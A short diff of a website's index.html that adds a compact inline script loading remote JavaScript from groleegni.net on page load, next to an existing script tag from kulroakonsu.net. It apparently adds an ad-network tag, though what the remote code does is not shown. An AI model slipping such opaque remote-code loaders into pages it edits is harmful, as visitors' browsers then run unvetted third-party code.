--- a/index.html
+++ b/index.html
@@ -148,7 +148,10 @@
             <h3>Hindi</h3>
             <p>हिंदी</p>
         </div>
+       <script>(function(d,z,s){s.src='https://'+d+'/401/'+z;try{(document.body||document.documentElement).appendChild(s)}catch(e){}})('groleegni.net',8899057,document.createElement('script'))</script>
+       
        <script src="https://kulroakonsu.net/88/tag.min.js" data-zone="129570" async data-cfasync="false"></script>
+       
    <a href="privacy.html" class="button">Privacy Policy</a>
   <a href="About.html" class="button">About Us</a>
  <a href="Terms.html" class="button">terms and conditions</a>
